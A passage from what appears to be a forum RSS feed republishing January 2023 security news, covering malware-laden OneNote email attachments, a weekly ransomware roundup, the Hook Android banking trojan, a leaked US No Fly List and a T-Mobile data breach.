	<span style="font-size:14px;">However, both <a href="https://www.bleepingcomputer.com/news/microsoft/7-zip-now-supports-windows-mark-of-the-web-security-feature/" rel="external nofollow">7-Zip</a> and <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-zero-day-bug-exploited-to-push-malware/" rel="external nofollow">Windows recently fixed</a> these bugs, causing Windows to display scary security warnings when a user attempts to open files in downloaded ISO and ZIP files.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="motw-flag-fixed.jpg" class="ipsImage" data-ratio="75.10" height="486" width="720" src="https://www.bleepstatic.com/images/news/Microsoft/m/mark-of-the-web/iso-files/motw-flag-fixed.jpg" />
		
			<p>
				<span style="font-size:14px;">Mark of the Web propagated to files inside an ISO<br />
				Source: BleepingComputer</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">Not to be deterred, threat actors quickly switched to using a new file format in their malicious spam (malspam) attachments: Microsoft OneNote attachments.</span>
</p>

<h2>
	<span style="font-size:14px;">Abusing OneNote attachments</span>
</h2>

<p>
	<span style="font-size:14px;">Microsoft <a href="https://www.microsoft.com/en-us/microsoft-365/onenote/digital-note-taking-app" rel="external nofollow">OneNote</a> is a desktop digital notebook application that can be downloaded for free and is included in Microsoft Office 2019 and Microsoft 365.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">As Microsoft OneNote is installed by default in all Microsoft Office/365 installations, even if a Windows user does not use the application, it is still available to open the file format.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Since mid-December, <a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/" rel="external nofollow">cybersecurity researchers warned</a> that threat actors <a href="https://twitter.com/Gi7w0rm/status/1602341345607172100" rel="external nofollow">had started distributing</a> malicious spam emails <a href="https://twitter.com/AttackTrends/status/1612780817473757187" rel="external nofollow">containing OneNote attachments</a>.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">From samples found by BleepingComputer, these malspam emails pretend to be DHL shipping notifications, invoices, ACH remittance forms, mechanical drawings, and shipping documents.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="dhl-onenote-phishing.jpg" class="ipsImage" data-ratio="75.10" height="490" width="720" src="https://www.bleepstatic.com/images/news/security/o/onenote/phishing/dhl-onenote-phishing.jpg" />
		
			<p>
				<span style="font-size:14px;">Fake DHL email with a OneNote attachment<br />
				Source: BleepingComputer</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">Unlike Word and Excel, OneNote does not support macros, which is how threat actors previously launched scripts to install malware.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Instead, OneNote allows users to insert attachments into a NoteBook that, when double-clicked, will launch the attachment.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Threat actors are abusing this feature by attaching malicious VBS attachments that automatically launch the script when double-clicked to download malware from a remote site and install it.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">However, the attachments look like a file's icon in OneNote, so the threat actors overlay a big 'Double click to view file' bar over the inserted VBS attachments to hide them.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="malicious-onenote-attachment.jpg" class="ipsImage" data-ratio="75.10" height="408" width="720" src="https://www.bleepstatic.com/images/news/security/o/onenote/phishing/malicious-onenote-attachment.jpg" />
		
			<p>
				<span style="font-size:14px;">Malicious OneNote email attachment<br />
				Source: BleepingComputer</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">When you move the Click to View Document bar out of the way, you can see that the malicious attachment includes multiple attachments. This row of attachments makes it so that if a user double-clicks anywhere on the bar, it will double-click on the attachment to launch it.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="hidden-attachments.jpg" class="ipsImage" data-ratio="42.96" height="299" width="696" src="https://www.bleepstatic.com/images/news/security/o/onenote/phishing/hidden-attachments.jpg" />
		
			<p>
				<span style="font-size:14px;">Hidden OneNote attachments<br />
				Source: BleepingComputer</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">Thankfully, when launching OneNote attachments, the program warns you that doing so can harm your computer and data.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">But unfortunately, history has shown us that these types of prompts are commonly ignored, and users just click the OK button.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="onenote-security-warning.jpg" class="ipsImage" data-ratio="55.56" height="342" width="720" src="https://www.bleepstatic.com/images/news/security/o/onenote/phishing/onenote-security-warning.jpg" />
		
			<p>
				<span style="font-size:14px;">OneNote attachment security warning<br />
				Source: BleepingComputer</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">Clicking the OK button will launch the VBS script to download and install malware. As you can see from one of the malicious OneNote VBS files found by BleepingComputer, the script will download and execute two files from a remote server.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The first one shown below is a decoy OneNote document that opens and looks like the document you expected. However, the VBS file will also execute a malicious batch file in the background to install malware on the device.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="vbs-file.jpg" class="ipsImage" data-ratio="75.10" height="363" width="720" src="https://www.bleepstatic.com/images/news/security/o/onenote/phishing/vbs-file.jpg" />
		
			<p>
				<span style="font-size:14px;">Malicious VB script attached to a OneNote attachment<br />
				Source: BleepingComputer</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">In malspam emails seen by BleepingComputer, the OneNote files install remote access trojans that include information-stealing functionality.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Cybersecurity researcher James confirmed this, telling BleepingComputer that the OneNote attachments he analyzed installed the AsyncRAT and XWorm remote access trojans.</span>
</p>

<p>
	 
</p>

<div>
	<div class="ipsEmbeddedOther">
		<iframe allowfullscreen="" data-controller="core.front.core.autosizeiframe" data-embedid="embed4727754023" src="https://nsaneforums.com/index.php?app=core&amp;module=system&amp;controller=embed&amp;url=https://twitter.com/James_inthe_box/status/1615421130877329409?ref_src=twsrc%255Etfw%257Ctwcamp%255Etweetembed%257Ctwterm%255E1615421130877329409%257Ctwgr%255E90211f70f8ffaa3298215da8759d7c3559ef93b2%257Ctwcon%255Es1_%26ref_url=https://www.bleepingcomputer.com/news/security/beware-hackers-now-use-onenote-attachments-to-spread-malware/" style="height:279px;"></iframe>
	</div>
</div>

<p>
	<span style="font-size:14px;">A OneNote attachment seen by BleepingComputer installs what is <a href="https://www.virustotal.com/gui/file/a90e0f8d1013ae7cac1836742c484d695c772fd2a47bbc9aa6478ac32b6961c2/community" rel="external nofollow">detected as the Quasar Remote Access trojan</a>.</span>
</p>

<h2>
	<span style="font-size:14px;">Protecting against these threats</span>
</h2>

<p>
	<span style="font-size:14px;">Once installed, this type of malware allows threat actors to remotely access a victim’s device to steal files and saved browser passwords, take screenshots, and in some cases, even record video using webcams.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Threat actors also commonly use remote access trojans to steal cryptocurrency wallets from victims' devices, making this a costly infection.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The best way to protect yourself from malicious attachments is to simply not open files from people you do not know. However, if you mistakenly open a file, do not disregard warnings displayed by the operating system or application.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">If you see a warning that opening an attachment or link could harm your computer or files, simply do not press OK and close the application.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">If you feel it may be a legitimate email, share it with a security or Windows admin to help you verify if the file is safe.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/beware-hackers-now-use-onenote-attachments-to-spread-malware/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">12050</guid><pubDate>Sat, 21 Jan 2023 17:11:44 +0000</pubDate></item><item><title>The Week in Ransomware - January 20th 2023 - Targeting Crypto Exchanges</title><link>https://nsaneforums.com/news/security-privacy-news/the-week-in-ransomware-january-20th-2023-targeting-crypto-exchanges-r12042/</link><description><![CDATA[<p>
	There has been quite a bit of ransomware news this week, with crypto exchanges being seized for alleged money laundering and researchers providing fascinating reports on the behavior of ransomware operators.
</p>

<p>
	 
</p>

<p>
	The most fascinating report this week comes from Jon DiMaggio who spent months going undercover to learn more about the LockBit's ransomware operation and its public representative known as LockBitSupp.
</p>

<p>
	 
</p>

<p>
	For those who want to learn more about the rise of the most prominent ransomware operation at this time, you should definitely give DiMaggio's <a href="https://analyst1.com/ransomware-diaries-volume-1/" rel="external nofollow" target="_blank">Unlocking LockBit - a Ransomware Story</a> a read.
</p>

<p>
	 
</p>

<p>
	The US and France also conducted a law enforcement operation where they seized the domain and <a href="https://www.bleepingcomputer.com/news/security/bitzlato-crypto-exchange-seized-for-ransomware-drugs-money-laundering/" target="_blank" rel="external nofollow">arrested the operator of the Bitzlato crypto exchange</a> for allegedly laundering crypto proceeds generated from ransomware and illegal drug transactions.
</p>

<p>
	 
</p>

<p>
	We also learned more about ransomware attacks conducted this week and in the past, including:
</p>

<p>
	 
</p>

<ul>
	<li>
		Vice Society ransomware <a href="https://www.bleepingcomputer.com/news/security/vice-society-ransomware-leaks-university-of-duisburg-essen-s-data/" target="_blank" rel="external nofollow">leaked the data for University of Duisburg-Essen</a> (UDE).
	</li>
	<li>
		A ransomware attack on shipping software supplier DNV <a href="https://therecord.media/ransomware-attack-on-maritime-software-impacts-1000-ships/" rel="external nofollow" target="_blank">impacted 1,000 ships</a>.
	</li>
	<li>
		Data was stolen from the <a href="https://www.bleepingcomputer.com/news/security/ransomware-gang-steals-data-from-kfc-taco-bell-and-pizza-hut-brand-owner/" target="_blank" rel="external nofollow">KFC, Taco Bell, and Pizza Hut brand owner</a> during an attack.
	</li>
	<li>
		<a href="https://www.bleepingcomputer.com/news/security/lausd-says-vice-society-ransomware-gang-stole-contractors-ssns/" rel="external nofollow" target="_blank">LAUSD confirmed SSNs were stolen</a> in last year’s ransomware attack.
	</li>
</ul>

<p>
	 
</p>

<p>
	However, it's not all bad news this week, with Avast releasing a <a href="https://www.bleepingcomputer.com/news/security/avast-releases-free-bianlian-ransomware-decryptor/" target="_blank" rel="external nofollow">free decryptor for the BianLian ransomware</a>.
</p>

<p>
	 
</p>

<p>
	Furthermore, reports from both Chainalysis and Coveware illustrate that <a href="https://www.bleepingcomputer.com/news/security/ransomware-profits-drop-40-percent-in-2022-as-victims-refuse-to-pay/" target="_blank" rel="external nofollow">ransomware payments dropped approximately 40%</a> in 2022 as companies refuse to pay and the enterprise invests in <a href="http://www.coveware.com/blog/2023/1/19/improved-security-and-backups-result-in-record-low-number-of-ransomware-payments" rel="external nofollow" target="_blank">stronger security and better backups</a>.
</p>

<p>
	 
</p>

<p>
	Contributors and those who provided new ransomware information and stories this week include: <a href="https://twitter.com/LawrenceAbrams" rel="external nofollow" target="_blank">@LawrenceAbrams</a>, <a href="https://twitter.com/demonslay335" rel="external nofollow" target="_blank">@demonslay335</a>, <a href="https://twitter.com/malwrhunterteam" rel="external nofollow" target="_blank">@malwrhunterteam</a>, <a href="https://twitter.com/Seifreed" rel="external nofollow" target="_blank">@Seifreed</a>, <a href="https://twitter.com/billtoulas" rel="external nofollow" target="_blank">@billtoulas</a>, <a href="https://twitter.com/PolarToffee" rel="external nofollow" target="_blank">@PolarToffee</a>, <a href="https://twitter.com/struppigel" rel="external nofollow" target="_blank">@struppigel</a>, <a href="https://twitter.com/serghei" rel="external nofollow" target="_blank">@serghei</a>, <a href="https://twitter.com/fwosar" rel="external nofollow" target="_blank">@fwosar</a>, <a href="https://twitter.com/BleepinComputer" rel="external nofollow" target="_blank">@BleepinComputer</a>, <a href="https://twitter.com/Ionut_Ilascu" rel="external nofollow" target="_blank">@Ionut_Ilascu</a>, <a href="https://twitter.com/chainalysis" rel="external nofollow" target="_blank">@chainalysis</a>, <a href="https://twitter.com/coveware" rel="external nofollow" target="_blank">@coveware</a>, <a href="https://twitter.com/BrettCallow" rel="external nofollow" target="_blank">@BrettCallow</a>, <a href="https://twitter.com/jgreigj" rel="external nofollow" target="_blank">@jgreigj</a>, <a href="https://twitter.com/pcrisk" rel="external nofollow" role="link" tabindex="-1" target="_blank">@pcrisk</a>, <a href="https://twitter.com/Avast" rel="external nofollow" target="_blank">@Avast</a>, and <a href="https://twitter.com/Jon__DiMaggio" rel="external nofollow" target="_blank">@Jon__DiMaggio</a>.
</p>

<h2>
	January 16th 2023
</h2>

<h3>
	<a href="https://analyst1.com/ransomware-diaries-volume-1/" rel="external nofollow" target="_blank">Unlocking LockBit - A Ransomware Story</a>
</h3>

<p>
	The LockBit ransomware gang is one of the most notorious organized cybercrime syndicates that exists today. The gang is behind attacks targeting private-sector corporations and other high-profile industries worldwide. News and media outlets have documented many LockBit attacks, while security vendors offer technical assessments explaining how each occurred. Although these provide insight into the attacks, I wanted to know more about the human side of the operation to learn about the insights, motivations, and behaviors of the individuals on the other side of the keyboard.
</p>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/avast-releases-free-bianlian-ransomware-decryptor/" target="_blank" rel="external nofollow">Avast releases free BianLian ransomware decryptor</a>
</h3>

<p>
	Security software company Avast has released a free decryptor for the BianLian ransomware strain to help victims of the malware recover locked files without paying the hackers.
</p>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/vice-society-ransomware-leaks-university-of-duisburg-essen-s-data/" target="_blank" rel="external nofollow">Vice Society ransomware leaks University of Duisburg-Essen’s data</a>
</h3>

<p>
	The Vice Society ransomware gang has claimed responsibility for a November 2022 cyberattack on the University of Duisburg-Essen (UDE) that forced the university to reconstruct its IT infrastructure, a process that's still ongoing.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1614878111895535617" rel="external nofollow" target="_blank">New STOP Ransomware variants</a>
</h3>

<p>
	<a href="https://twitter.com/pcrisk" rel="external nofollow" role="link" target="_blank">PCrisk</a> found new STOP ransomware variants that append the .poqw and .pouu extensions.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1614962980139024387" rel="external nofollow" target="_blank">New VoidCrypt ransomware</a>
</h3>

<p>
	PCRisk found a new VoidCrypt variant that appends the .gogo extension and drops a ransom note named unlock-info.txt.
</p>

<h2>
	January 17th 2023
</h2>

<h3>
	<a href="https://therecord.media/ransomware-attack-on-maritime-software-impacts-1000-ships/" rel="external nofollow" target="_blank">Ransomware attack on maritime software impacts 1,000 ships</a>
</h3>

<p>
	About 1,000 vessels have been affected by a ransomware attack against a major software supplier for ships.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1615217105804341248" rel="external nofollow" target="_blank">New Phobos ransomware variant</a>
</h3>

<p>
	PCRisk found a Phobos variant that appends the .STEEL extension and drops a ransom note named info.txt.
</p>

<h2>
	January 18th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/bitzlato-crypto-exchange-seized-for-ransomware-drugs-money-laundering/" target="_blank" rel="external nofollow">Bitzlato crypto exchange seized for ransomware, drugs money laundering</a>
</h3>

<p>
	The U.S. Department of Justice arrested and charged Russian national Anatoly Legkodymov, the founder of the Hong Kong-registered cryptocurrency exchange Bitzlato, with helping cybercriminals allegedly launder illegally obtained money.
</p>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/ukraine-links-data-wiping-attack-on-news-agency-to-russian-hackers/" target="_blank" rel="external nofollow">Ukraine links data-wiping attack on news agency to Russian hackers</a>
</h3>

<p>
	The Computer Emergency Response Team of Ukraine (CERT-UA) has linked a destructive malware attack targeting the country's national news agency (Ukrinform) to Sandworm Russian military hackers.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1615605907831902209" rel="external nofollow" target="_blank">New Xorist ransomware variant</a>
</h3>

<p>
	PCRisk found a Xorist variant that appends the .BoY extension and drops a ransom note named HOW TO DECRYPT FILES.txt.
</p>

<h2>
	January 19th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/ransomware-profits-drop-40-percent-in-2022-as-victims-refuse-to-pay/" target="_blank" rel="external nofollow">Ransomware profits drop 40% in 2022 as victims refuse to pay</a>
</h3>

<p>
	Ransomware gangs extorted from victims about $456.8 million throughout 2022, a drop of roughly 40% from the record-breaking $765 million recorded in the previous two years.
</p>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/ransomware-gang-steals-data-from-kfc-taco-bell-and-pizza-hut-brand-owner/" target="_blank" rel="external nofollow">Ransomware gang steals data from KFC, Taco Bell, and Pizza Hut brand owner</a>
</h3>

<p>
	Yum! Brands, the fast food brand operator of KFC, Pizza Hut, Taco Bell, and The Habit Burger Grill fast-food restaurant chains, has been targeted by a ransomware attack that forced the closure of 300 locations in the United Kingdom.
</p>

<h3>
	<a href="https://gov.nu.ca/news/qulliq-energy-corporation-impacted-cybersecurity-incident" rel="external nofollow" target="_blank">Qulliq Energy Corporation impacted by a cybersecurity incident</a>
</h3>

<p>
	Qulliq Energy Corporation (QEC) was targeted in an illegal cyberattack on January 15. QEC’s network was breached, and the corporation took immediate actions to contain the situation.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1615947616759545858" rel="external nofollow" target="_blank">New STOP Ransomware variants</a>
</h3>

<p>
	PCrisk found new STOP ransomware variants that append the .mzqw and .mzop extensions.
</p>

<h2>
	January 20th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/lausd-says-vice-society-ransomware-gang-stole-contractors-ssns/" target="_blank" rel="external nofollow">LAUSD says Vice Society ransomware gang stole contractors’ SSNs</a>
</h3>

<p>
	Los Angeles Unified School District (LAUSD), the second-largest school district in the United States, says the Vice Society ransomware gang has stolen files containing contractors' personal information, including Social Security Numbers (SSNs).
</p>

<h3 data-content-field="title">
	<a href="https://www.coveware.com/blog/2023/1/19/improved-security-and-backups-result-in-record-low-number-of-ransomware-payments" rel="external nofollow" target="_blank">Improved Security and Backups Result in Record Low Number of Ransomware Payments</a>
</h3>

<p>
	Over the last 4 years, the propensity for victims of ransomware to pay a ransom has fallen dramatically, from 85% of victims in Q1 of 2019, to 37% of victims in Q4 of 2022. On an annual basis, 41% of victims paid in 2022 vs. 76% in 2019. Despite the best efforts of the cyber criminals rowing in the opposite direction, shaving 48 whole percentage points off this key indicator has been the result of several factors.
</p>

<h3>
	<a href="https://therecord.media/costa-ricas-ministry-of-public-works-and-transport-crippled-by-ransomware-attack/" rel="external nofollow" target="_blank">Costa Rica’s Ministry of Public Works and Transport crippled by ransomware attack</a>
</h3>

<p>
	Costa Rica’s government has suffered another ransomware attack just months after several ministries were crippled in a wide-ranging attack by hackers using the Conti ransomware.
</p>

<h3>
	That's it for this week! Hope everyone has a nice weekend!
</h3>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-20th-2023-targeting-crypto-exchanges/" rel="external nofollow">The Week in Ransomware - January 20th 2023 - Targeting Crypto Exchanges</a>
</p>
]]></description><guid isPermaLink="false">12042</guid><pubDate>Sat, 21 Jan 2023 03:29:55 +0000</pubDate></item><item><title>New 'Hook' Android malware lets hackers remotely control your phone</title><link>https://nsaneforums.com/news/security-privacy-news/new-hook-android-malware-lets-hackers-remotely-control-your-phone-r12032/</link><description><![CDATA[<p>
	<span style="font-size:14px;">A new Android malware named 'Hook' is being sold by cybercriminals, boasting it can remotely take over mobile devices in real-time using VNC (virtual network computing).</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The new malware is promoted by the creator of <a href="https://www.bleepingcomputer.com/news/security/new-ermac-20-android-malware-steals-accounts-wallets-from-467-apps/" rel="external nofollow">Ermac</a>, an Android banking trojan selling for $5,000/month that helps threat actors steal credentials from over 467 banking and crypto apps via overlaid login pages.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Although Hook's author claims the new malware was written from scratch, and although it does have several features Ermac lacks, researchers at ThreatFabric dispute the claim and report seeing extensive code overlap between the two families.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">ThreatFabric explains that Hook contains most of Ermac's code base, so it's still a banking trojan. At the same time, it includes several unnecessary parts found in the older strain that indicate it re-used code in bulk.</span>
</p>

<h2>
	<span style="font-size:14px;">A more dangerous Android malware</span>
</h2>

<p>
	<span style="font-size:14px;">Despite its origin, Hook is an evolution of Ermac, offering an extensive set of capabilities that make it a more dangerous threat to Android users.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">One new feature of Hook compared to Ermac is the introduction of WebSocket communication, which comes in addition to the HTTP traffic used exclusively by Ermac. The network traffic is still encrypted with a hardcoded AES-256-CBC key.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The highlight addition, however, is the 'VNC' module that gives threat actors the capability to interact with the user interface of the compromised device in real-time.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="hook.png" class="ipsImage" data-ratio="75.74" height="540" width="529" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/4/hook.png" />
	<p>
		<span style="font-size:14px;">Hook's author promoting the new VNC system (ThreatFabric)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">This new system enables Hook's operators to perform any action on the device, from PII exfiltration to monetary transactions.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"With this feature, Hook joins the ranks of malware families that are able to perform full DTO, and complete a full fraud chain, from PII exfiltration to transaction, with all the intermediate steps, without the need of additional channels," <a href="http://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities.html" rel="external nofollow">warns ThreatFabric</a>.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"This kind of operation is much harder to detect by fraud scoring engines, and is the main selling point for Android bankers."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The catch is that Hook's VNC requires Accessibility Service access to work, which might be hard to get on devices running Android 11 or later.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The commands Hook adds on top of Ermac's can perform the following actions:</span>
</p>

<p>
	 
</p>

<ul>
	<li>
		<span style="font-size:14px;">Start/stop RAT</span>
	</li>
	<li>
		<span style="font-size:14px;">Perform a specific swipe gesture</span>
	</li>
	<li>
		<span style="font-size:14px;">Take a screenshot</span>
	</li>
	<li>
		<span style="font-size:14px;">Simulate click at specific text item</span>
	</li>
	<li>
		<span style="font-size:14px;">Simulate a key press (HOME/BACK/RECENTS/LOCK/POWERDIALOG)</span>
	</li>
	<li>
		<span style="font-size:14px;">Unlock the device</span>
	</li>
	<li>
		<span style="font-size:14px;">Scroll up/down</span>
	</li>
	<li>
		<span style="font-size:14px;">Simulate a long press event</span>
	</li>
	<li>
		<span style="font-size:14px;">Simulate click at a specific coordinate</span>
	</li>
	<li>
		<span style="font-size:14px;">Set the clipboard value into a UI element at specific coordinates</span>
	</li>
	<li>
		<span style="font-size:14px;">Simulate click on a UI element with a specific text value</span>
	</li>
	<li>
		<span style="font-size:14px;">Set a UI element value to a specific text</span>
	</li>
</ul>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Apart from the above, a "File Manager" command turns the malware into a file manager, allowing the threat actors to get a list of all files stored in the device and download specific files of their choice.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Another notable command that ThreatFabric found concerns WhatsApp, allowing Hook to log all messages in the popular IM app and even allowing the operators to send messages via the victim's account.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Finally, a new geolocation tracking system enables Hook operators to track the victim's precise position by abusing the "Access Fine Location" permission.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="location.png" class="ipsImage" data-ratio="52.08" height="359" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/4/location.png" />
</div>

<div>
	<span style="font-size:14px;">Tracking the victim's precise location (ThreatFabric)</span>
</div>

<h2>
	<span style="font-size:14px;">Worldwide targeting</span>
</h2>

<p>
	<span style="font-size:14px;">The banking applications Hook targets are used in the United States, Spain, Australia, Poland, Canada, Turkey, the UK, France, Italy, and Portugal.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="targets.png" class="ipsImage" data-ratio="75.10" height="405" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/4/targets.png" />
	<p>
		<span style="font-size:14px;">Number of banking apps per country targeted by Hook (ThreatFabric)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">However, it is essential to note that Hook's broad targeting scope covers the entire world. ThreatFabric listed all the apps Hook targets in the <a href="https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities.html#appendix" rel="external nofollow">report's appendix</a> for those interested.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">At this time, Hook is distributed as a Google Chrome APK under the package names "com.lojibiwawajinu.guna," "com.damariwonomiwi.docebi," "com.damariwonomiwi.docebi," and "com.yecomevusaso.pisifo," but of course, this could change at any moment.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">To avoid becoming infected with Android malware, you should only install apps from the Google Play Store or those provided by your employer.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/new-hook-android-malware-lets-hackers-remotely-control-your-phone/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">12032</guid><pubDate>Fri, 20 Jan 2023 19:57:09 +0000</pubDate></item><item><title>U.S. &#x2018;No Fly List&#x2019; Leaks After Being Left in an Unsecured Airline Server</title><link>https://nsaneforums.com/news/security-privacy-news/us-%E2%80%98no-fly-list%E2%80%99-leaks-after-being-left-in-an-unsecured-airline-server-r12030/</link><description><![CDATA[<p>
	<span style="font-size:18px;">The list, which was discovered by a Swiss hacker, contains names and birth dates and over 1 million entries.</span>
</p>

<p>
	 
</p>

<p>
	A copy of the U.S. No Fly List has leaked after being stored on an unsecured server connected to a commercial airline. The No Fly List is an official list maintained by the U.S. government of people it has banned from traveling in or out of the United States on commercial flights.
</p>

<p>
	 
</p>

<p>
	As first reported by The Daily Dot, a Swiss hacker known as maia arson crimew discovered the list on an unsecured Jenkins server one night while poking around on Shodan, a search engine that lets people look through servers connected to the internet.
</p>

<p>
	 
</p>

<p>
	“Like so many other of my hacks this story starts with me being bored and browsing shodan (or well, technically zoomeye, Chinese shodan), looking for exposed jenkins servers that may contain some interesting goods,” crimew said in a blog about the leak. “At this point I've probably clicked through about 20 boring exposed servers with very little of any interest, when I suddenly start seeing some familiar words. ‘ACARS,’ lots of mentions of ‘crew’ and so on. Lots of words I've heard before, most likely while binge watching Mentour Pilot YouTube videos. Jackpot. An exposed jenkins server belonging to CommuteAir.”
</p>

<p>
	 
</p>

<p>
	On the server was a large amount of company data about CommuteAir, including private information about its employees. There was also a file containing a copy of a 2019 edition of the No Fly List. The list includes names and birth dates and more than 1.5 million entries, but many of those entries are aliases that all reference the same person. “It’s so much bigger than I thought it’d be,” crimew told Motherboard.
</p>

<p>
	 
</p>

<p>
	“TSA is aware of a potential cybersecurity incident, and we are investigating in coordination with our federal partners,” a spokesperson for the TSA told Motherboard.
</p>

<p>
	 
</p>

<p>
	The United States has maintained a No Fly List for decades, but it was much smaller in the days before 9/11, when it contained only 16 people. After the attacks and the creation of the Department of Homeland Security, the list rapidly expanded. The exact number of people on the list is unknown, and the leaked data is a few years old and contains multiple entries for a single individual, but recent estimates put the total number at somewhere between 47,000 and 81,000 people.
</p>

<p>
	 
</p>

<p>
	“It’s a perverse outgrowth of the U.S. police and surveillance state,” crimew said. “Just a list with no due process…mostly just based on them being related to someone or being from the same village as someone. It’s so massive. I feel like this has no place anywhere. I feel like this doesn’t solve the problem.”
</p>

<p>
	 
</p>

<p>
	crimew told Motherboard they weren’t shocked to stumble on an unsecured copy of the No Fly List. “I’ve been digging into various jenkins [servers] for a while and there’s just so much to find,” they said. “It was just a matter of time until I found something like this.”
</p>

<p>
	 
</p>

<p>
	CommuteAir said the leak happened because of a misconfigured development server. “The researcher accessed files including an outdated 2019 version of the federal no-fly list that included first and last name and date of birth,” it said. “Additionally, through information found on the server the researcher discovered access to a database containing personal identifiable information of CommuteAir employees. Based on our initial investigation, no customer data was exposed. CommuteAir immediately took the affected server offline and started an investigation to determine the extent of data access. CommuteAir has reported the data exposure to the Cybersecurity and Infrastructure Security Agency, and also notified its employees.”
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.vice.com/en/article/93a4p5/us-no-fly-list-leaks-after-being-left-in-an-unsecured-airline-server" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">12030</guid><pubDate>Fri, 20 Jan 2023 19:06:34 +0000</pubDate></item><item><title>T-Mobile announces another data breach, impacting 37 million accounts</title><link>https://nsaneforums.com/news/security-privacy-news/t-mobile-announces-another-data-breach-impacting-37-million-accounts-r12013/</link><description><![CDATA[<h3>
	The attacker obtained customer names, billing addresses, emails, phone numbers, and birth dates through an internal API.
</h3>

<div>
	<div>
		<p>
			T-Mobile has revealed the company’s second major breach in less than two years, admitting that a hacker was able to obtain customer data, including names, birth dates, and phone numbers, from 37 million accounts. The telecom giant said in a <a href="https://www.sec.gov/Archives/edgar/data/1283699/000119312523010949/d641142d8k.htm" rel="external nofollow">regulatory filing</a> on Thursday that it currently believes the attacker first retrieved data around November 25th, 2022, through one of its APIs.
		</p>

		<p>
			 
		</p>
	</div>

	<div>
		<p>
			T-Mobile says it detected malicious activity on January 5th and that the attacker had access to the exploited API for over a month. The company says it traced the source of the malicious activity and fixed the API exploit within a day of the detection. T-Mobile says the API used by the hacker did not allow access to data that contained any social security numbers, credit card information, government ID numbers, passwords, PINs, or financial information.
		</p>

		<p>
			 
		</p>
	</div>

	<div>
		<p>
